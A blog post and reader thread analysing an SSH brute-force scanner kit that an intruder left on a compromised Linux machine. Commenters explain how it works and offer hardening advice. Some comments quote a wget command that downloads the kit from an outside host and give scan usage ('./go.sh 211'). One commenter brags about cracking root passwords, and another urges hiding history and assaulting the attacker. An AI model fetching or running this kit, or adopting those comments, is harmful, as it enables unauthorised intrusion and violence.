Here's what I can glean from them. First he checks who else is using the system, and how long it's been idle. Then, checks my mount history and mounts another linux partition (for Ubuntu Karmic). Then he changes my root password. I'm not sure why he did this - had he left it alone he would have had root access and I would have never known my system was compromised. Then he goes to a hidden .tmp directory and unzips gosh.tar, enters the directory, makes all files inside executable, and runs several commands. After he attempts to run go.sh, he then adds an alias for my ethernet card. I'm not sure what the purposes of this is. He then runs go.sh again. Afterwards he types "1", which is a file, but it's only a list of user names and passwords, presumably for a brute force attack. I find it notable that (1) it appears to be a person, and not a bot/script - thus the typo ";s" instead of "ls", and (2) the .bash_history was not erased. I'm not sure about the usage of "screen" - I'm assuming that screen logs commands in .bash_history, but maybe it does not. Also, I don't know if commands issued through ssh (without using a login shell) or sftp are logged in .bash history - that would explain how gosh.tar got on my system but is not mentioned in the .bash_history.

One script, "scam", sends mail to the address "mafia89tm@yahoo.com". I'm not sure if this script was ever called. Here's part of it (it's long, and repetitive). Unfortunately, with the current formatting of this blog you lose the rad ASCII art, so I've included it here.

Yeah, you may be right about that. It seems odd that it’s such a small, geographically limited list. I checked one of them and it’s from Malaysia. I’ve thought that it may also be IPs that it will take orders from?

So, scan an entire class-A as fast as possible from eth0. The IP addresses that respond on port 22 (ssh) get added to bios.txt. The second line from go.sh sorts and removes duplicates from the list of IP addresses, and outputs to mfu.txt. ssh-scan is the SSH brute force tool. It takes input from the file “mfu.txt” as a list of IP addresses to attack, and from file “pass_file” as a list of username/password combinations to try. Output (user:pass:IP) goes to “vuln.txt”. Take a closer look at the script named “a” for additional post processing.

@James – That first IP appears to be from Romania, and the second from UK. I suppose at least one of those are other compromised machines?

@Kenny – Thanks for the insight on those IPs. I don’t quite understand where those particular IPs are coming from. Just a random assortment of new targets running ssh? I tried using a reverse DNS lookup on a few of them, but it was unsuccessful.

A network/port scanner is like a brute forcer or wardialer for network services. This scanner was pointed at the 211 class-A and tried connecting to every IP (211.*.*.*) on port 22. The IP addresses listed are the hosts that answered. They were targets for the attacks coming from your host, but not yet victims. If you had any entries in vuln.txt, then you would have victims to notify. (Contents could have been removed.) The IP’s are all over the apnic map: China, Taiwan, Malaysia, Australia, and Korea.

Oh, and as for why they changed your password, the script kiddies MO is “own more stuff than the other guy.” If they share, then some one else is likely to get the attention of the admin and spoil fun. So they plug obvious holes, like the one they got in through. Generally speaking, an admin who isn’t present enough to change a default password won’t notice if it gets changed for them.

screen is a terminal multiplexer, ssh to a server, type ‘screen’ and you can have multiple ‘sessions’ although you’ve only logged in once. (That’s not the most accurate description but once you try it out, you’ll understand…it’s pretty awesome.)

It was probably somebody who got really lucky and was just typing stuff they saw on some website, hence the typo (and the reason for changing the password). As you noted, someone less careless would have been more difficult to detect.

Thanks for your comment Ashley. I’m actually familiar with screen, but what I wasn’t sure about was whether screen logged its commands to .bash_history. It turns out it doesn’t (or at least not the way things are configured on my machine). So that may explain why certain files appeared on my machine, with no reference in the history as to how they got there.

I agree with you though, this was probably just the work of a script kiddie — I almost certainly wouldn’t have caught it (or at least not for a much longer time) if it was the work of someone more experienced.

You can get these files from this address
wget adelinuangell.lx.ro/cote/go.tar
This guy access my computer , and log some commands to .bash_history.
I find this address from .bash_history.
Screen is a utils to remove log information from wtmp/utmp, i think so.

That is a ssh brute force scanner and is quite common in the script kiddies group. The bad thing about it is that is used to scan an entire IP class (noticed ./ss -a) , the attacker has scanned 211.*.*.* and this on a machine without a good processor/s can crash the linux machine in few seconds.

mfu.txt is the list of the IP’s sorter for duplicate entries .
pscan2 is a scan binary used to use scanner from a nonroot user since ./ss can be used only by uid0 user.

As usual this is a normal behaveur of linux kiddies , they got some shits like this and are ruining peoples PC.
As far as i know there is a new hacking report service at http://rep.hack-report.info , they are new in business but are doing a good work , once your site is reported as attacked and a log is submited they are reporting the attacker to local authorities from any country the attacker could be , in your case i am sorry to announce that attacker is from my country : Romania , i know that because i personaly have investigated some attack’s and i have found this scanner.

I have seen thousands of these attacks, and was so annoyed a watching my logs fill up with rubbish, I wrote a linux service to monitor syslog, gather the evidence, ban the ip address with iptables, get the abuse address responsible for the ip address and sent a mail notifying them that one of their machines is owned, after checking a do-not-mail list of delinquent ISPs.
In many cases the mails are ignored, bounce or defer (which are then added to the do-not-mail db) but some are actually read and acted upon, and some compromised machines do get fixed, and sometimes even with a thank you note, which really does make the 100,000+ messages I have sent worthwhile.

The ip addresses go into a database, currently 1.25 million rows, each containing the date of the last ten times seen, ban type, status and how many times banned. They are linked to another table containing the evidence.

Another process expires the ban from iptables (10 * number of bans) days later.
It also handles ftp brute force attacks.

I have another one that scans the maillog, and sends reports for smtp and pop3 abuses… It’s good to kick some ass in return!

lol,
its a script to brute root’s but there is no attackers Real IP, cuz since the hacker Hacked the first shell, than from that shell he hack others, cuz there is a long procces to scan thousnd of IP’s so he need a linux shell that stays 24/7 Online, and , only VPS’s or workstations have this abilitys with high performance like intel Xeon,i7,Opteron AMD proccessors etc. hackers need linux shells to build on them, Servers to control other Zombie Clients, or to perform a high traffic DDoS attack..etc.

Plz don’t waste time to catch the person who did this. Only try securing ur Box,

Ilir,
I know this won’t catch the hacker because they can be behind a long chain of proxies, but it helps to alert the owners that their server is hacked and get it cleaned up and secured.
Hopefully they will learn to be better administrators and not use stupid passwords!

you have been hack by a romanian hackers team ,and i read in that screen :
“privat scanner.the scanner can be used only by `MaLaSorTe` team.This scanner `contain` a password file by 3 megabytes long”.
lol ,try to find the log pass 3mb one and delete it couse maybe is cmod 777 ,and look for other files cmod 777 cause the hackers are writing executables in your server and the they upgrading your server to laugh :))

i have the full script and i have toyed with it try to use ./go.sh 140.0 it scans ranges of ips and then brutforces the pws :) i have poped like 50 root pws now kinda cool really but i don’t do anything with them i typed that from root ssh and it will scan for a bit La-AmParam means you got one it will place the cracked roots in a file called Vuln.txt its just a simple scanner no harm but it uses a lot of bandwidth watch out for scan.pl tho because thats a UDP,TCP XSS RFI LFI scanner! Perl

yeah bro i dont think http://rep.hack-report.info will be doing much of anything there account is suspended for Hacking the BOX ROFL ROFL ROFL not to sound kiddy like :) but disable History -c :)) find the sob kick his door in :) smack him around a bit tell him why you are there and then take off

I just went to the history command and found that two directories were created, one in /home/root called zen and another in /tmp called .ssh. I just deleted all. I just can not understand how is possible that someone called human would do this. Should we apply the same laws than we apply for productive people? fuf…………. the guy like downloaded alecsafk.ilive.ro/a/a.tgz. Here what he did (even he is so stupid that made a typo!!)

it’s a script that scans for other computers that have vulnerable sshs passwords ( thesma e way he hacked your computer ) he changue de eth0 becouse the scanner need that subnet and stuff the mfu are a list of possible vulnerable victims ,, karl-koch@hotmail.com if i can help you Messenger.

” SCANER PRIVAT
SCANER FOLOSIT DOAR DE TEAMUL MaLaSorTe
SACNERUL CONTINE UN PASS_FLIE DE 3MEGA !! ”
Translate this from Romanian to your language.
This are romanian script kiddies. You cant trace them to Romania because they use multiple servers just like Lotus said. Get a server, scan from it till it breaks.

Oh! This is alarming. I thought Linux has a great security in preventing hackers attack. However, there seems a way to enter into any server. While technology keeps advancing, so do the hacking techniques.

I think these hackers use a network of proxies which make it difficult to identify from which IP they are targeting the server. While ssh is the most easily used one to gain access to remote shell, this is where we need to make it more secure.

The best way to secure you server, is to change your ssh server port, or to disable login root (they can get access to your server by an user, and use some local root exploit to gain root access). because, the ssh scaners, using the port 22 to scan victims. on my server, the ssh is using a 4 number port. like 6354. and, never get hacked.
PS: sorry for my bad english :P

Installing and configuring Fail2Ban will help too for securing the server by blocking the IP address of somebody that tries to access the server after couples of tries. The default is 3. this is alone is not enough but it can be added next to other suggestion that was mentioned in this blog.

basically what everybody else said. the “ss” binary is designed to scan an ip range for servers with a given port open. It does thousands of scans per minute and saves the results to a text file. The other executables take an input file (the IP list) and an output file. It’s most likely that if you got broken in, it was through a really simple ssh brute force (seriously, password is not a good password), a RFI exploit, or even a RCE exploit. (google them). Use your brains when setting up a server and you’ll be fine.

Hi guys! I just saw what you wrote. Unfortunately most of the so called “hackers” are from Eastern Europe(e.g:Macedonia, Bulgaria, Romania,etc.) They are just your machine to gain access to another machines and so on… Probably you have a weak password(pass, password, 123456, root…so on) and do not have installed honeypot. Try installing honeypot and keeping your system up-to-date. It always helps. Another personal point of view is that if you disable root login it will be safe. Another idea would be to uninstall commands editor (pico, nano) and also wget, apt-get, yum, ftp and stuff like this. If you don’t allow him to access external links he will find your machine useless and move on to the next one.
Best Regards,
Chip.

the MFU.TXT its the ip range the hacker scan it for ssh scanner its ssh-root scanner
the result must be in txt calld ” VULN.TXT ”
ITS OLD KIND OF SSH SCANNER BY ROMANIAN HACKER TEAM
THY HAVE NOW NEW ONE AND MORE STRONGER IN ARAB TEAM AND INDONESIAN TEAM ……

THE SCAN AS FOLLOW FROM IP
./go.sh 211
./GO-SH +IP <> START SCAN FROM 211.0.0.1 — TO — 211.255.255.255
AFTER GET THE RESULT AND FIND PORT 22 OPEN ON SOME IP
PROGRAM MAKE CHECK THE IP WITH PASS FILE CALLD
pass_file <<>>

I just realized that one of my servers (OpenVZ container launched with many others aside) got hacked exact same way.
What is strange is that I already runned SSH on non standard port like 40022.
In my case deploy user that I use for accessing local git repository was hacked – I’m not even sure what password was set for that user.

Is there any way I can cleanup my server or I should drop it and start with new VPS ?

I have this exact problem this very moment on one of my servers, and I’m not able to get rid of it. I disabled root login via ssh, deleted binaries and all the related files, and somehow this guy gets root again and has these files again in /usr/share/locales/af/ …